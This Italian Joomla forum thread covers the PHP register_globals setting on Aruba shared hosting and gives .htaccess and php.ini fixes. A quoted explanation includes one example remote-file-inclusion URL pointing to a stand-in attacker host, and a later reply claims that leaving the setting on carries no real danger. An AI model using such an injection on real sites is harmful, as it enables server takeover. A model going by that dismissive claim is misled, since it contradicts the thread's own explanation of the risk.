- Home
- Categorie
- Coding e Sistemistica
- Joomla!
- Register globals
-
Register globals
Salve ragazzi magari questa discussione l'avete già affrontata ma non riesco a trovare la funzione di cerca nel forum quindi apro un post nuovo di zecca.....
Ho acquistato su Aruba un hosting linux per installare Joomla ma quando entro nell'amministratore del portale mi segnala la seguente mancanza:
Impostazione PHP register_globals è `ON` invece di `OFF`Se non sbaglio per settare il tutto in maniera ottimale si dovrebbe contattare chi ci fornisce l'hosting ma non vorrei sbagliarmi........
Qualcuno sa indicarmi come fare ed in caso dirmi cosa succederebbe lasciando cmq questa funzione scoperta???P.S. Ho provato ad installare una galleria immagini che mi da problemi solo su questo sito e credo dipenda da questo ma attendo vostre delucidazioni!!
-
Dal forge di joomla:
Register Globals
Cosa fa?
La funzione register_globals aiuta gli sviluppatori nella creazione di componenti. Essa infatti permette a tutti i valori che sono processati dallo script e li mette in variabili. Significa che
index.php?foo=bar
crea automaticamente la variabile $foo con il valore bar nello script index.php
Perchè è un rischio? Principalmente perchè la funzione non controlla il valore. Così se vuoi sovrascrivere il path di Joomla usato per includere files, lo permette
index.php?mos_config_livesite=http://bad.hacker.tld
Ora l'index.php proverà ad includere questo file e caricherà un file dal server. Con questo script, l'intruso avrà accesso al tuo server.
La funzione da sola non è un problema. Se controlli ogni variabile prima di usarne il contenuto, sei praticamente al sicuro, e ti aiuta (se sei uno sviluppatore). In Joomla questo è semplice. Per gli sviluppatori c'è una funzione chiamata mosGetParam(), che compie tutti i controlli per te ed è veramente semplice da usare. Se tutti gli sviluppatori usano questa funzione e non il register_globals, abbiamo veramente pochi problemi di sicurezza
Come posso mettere il register_globals Off?
Configurazione di Apache/Php
Se hai accesso al file di configurazione del tuo server puoi scrivere
register_globals = Off
Devi avere un po di esperienza, o rischi che il server non risponda più
file .htaccess
In molti server, puoi configurare apache tramite i file .htaccess Questi file non possono essere letti dal web!
Per creare questo file puoi creare un documento con blocco note o linux (non Word !) e inserire la linea
php_flag register_globals off
Se lo salvi nella cartella del tuo Joomla, metterai il tuo register_globals a off eliminando i rischi per la sicurezza
php.ini
Quando il file .htaccess non è accessibile, puoi usare il file php.ini
La linea da inseirire o modificare è la seguente
register_globals = off
Una soluzione potrebbe essere quella di creare un file php.ini da mettere in tutte le cartelle o modificare il file php.ini del server.
Se non hai accesso al php.ini devi richiedere al tuo provider di hosting se può metterti il register_globals a off.
Se si rifiuta, è consigliabile cambiare hosting, in quanto si tratta di una forma di sicurezza basilare utilizzata da molti anni
-
grazie mille sei stato esaustivo come sempre ed ora tutto mi è più chiaro, il mio Host è presso aruba secondo voi va bene per Joomla o mi consigliate qualcosa di diverso????
Grazie ancora per l'aiuto!!
-
Non è il massimo, ma i siti in joomla ci girano...
certo, poi dipende da che sito devi metterci...
-
Allora in realtà sono 2 i siti che devo costruire......
Il primo è un semplice sito vetrina e quindi su quello non ho grossi problemi mentre il secondo è un negozio online ed ho paura che questa cosa possa darmi dei grattacapi in caso sapreste indicarmi un hosting sicuro!?!??
Grazie mille!
-
Per il primo, come hai già capito da solo, puoi tranquillamente sfruttare il vantaggio economico di aruba.
Per il secondo, cercherei qualcosa di più professionale, ma non me la sento di fare nomi, in quanto, può capitare che alcuni utenti si trovino bene e altri no.
-
Ciao a tutti,
Intervengo nella discussione perché ho lo stesso problema: aruba mi ha risposto che non essendo su un server dedicato non posso andare a modificare il valore di Register Globals.
Quindi mi sono posto queste domande:
Tutti gli hosting condivisi hanno questo problema?
Se non sono uno sviluppatore e uso solamente estensioni ufficiali o quantomeno ritenute molto affidabili, corro comunque qualche rischio?
Qual'è il rischio effettivo di vedersi defacciato il sito se lascio Register Globals su ON?
Grazie!
-
ciao bizio e benvenuto nel Forum GT
Ormai la maggior parte dei provider lo imposta già di default, purtroppo aruba ancora no
-
Ti ringrazio per aver risposto.
Il sito su cui ho installato joomla è aziendale, il passaggio su aruba è stato effettuato da qualche giorno. 30 euro non sono tanti, ma se dovessi rieffettuare un nuovo passaggio credo che qui non la prenderebbero troppo bene o_O
...quanto rischio concretamente a lasciarlo su aruba? in altre parole: è così facile con Register Globals ON danneggiare un sito web?P.s.: non è che mi consiglieresti un buon provider per joomla, magari in MP?
Grazie!
-
Pochi provider lo hanno disabilitato di default ma ti danno comunque la possibilità di avere files php.ini che ti permettano di modificare il settaggio di register globals.
-
ma quindi concretamente il mio rischio è alto oppure è solo un po' più alto della media? Perché se è veramente alto cambio mnt subito...
Oltre al provider pubblicizzato da joomla.it, quali sono quelli che permettono il settaggio di register globals?
-
Non hai reali pericoli, l'80% per cento dei siti Joomla ha register globals abilitato secondo me.
Se vuoi un buon hosting, servizio completo e ottima assistenza (lo uso anch'io) prova hostagator.com
C'è anche la possibilità di disabilitare register globals.Nel htaccess con loro puoi mettere:
php_flag register_globals off
php_flag mysql.allow_persistent off
php_value max_execution_time 300
php_value memory_limit 8M
php_value post_max_size 20M
php_value upload_max_filesize 20M
oltre al resto, rewrite ecc.